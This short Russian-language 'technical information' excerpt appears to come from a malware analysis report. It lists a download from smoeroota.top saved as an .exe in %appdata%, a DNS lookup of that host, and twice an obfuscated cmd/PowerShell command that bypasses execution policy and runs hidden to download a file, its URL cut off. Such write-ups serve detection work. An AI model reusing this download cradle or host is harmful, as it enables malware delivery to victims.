Техническая информация
- http://smoeroota.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^o^w^ErS^h^EL^L.^ex^E -^exec^u^T^Io^n^POlicY^ byP^aSS -n^opr^ofilE^ -^W^I^Ndo^wST^y^LE^ hiddE^N ^(new^-o^bj^E^CT^ ^s^Y^S^Te^M.ne^T^.wEBCLIE^nt).DoWn^loa^DFIL^e^(^'http:/...
- DNS ASK sm###oota.top
- '<SYSTEM32>\cmd.exe' /C "P^o^w^ErS^h^EL^L.^ex^E -^exec^u^T^Io^n^POlicY^ byP^aSS -n^opr^ofilE^ -^W^I^Ndo^wST^y^LE^ hiddE^N ^(new^-o^bj^E^CT^ ^s^Y^S^Te^M.ne^T^.wEBCLIE^nt).DoWn^loa^DFIL^e^(^'http:/...' (со скрытым окном)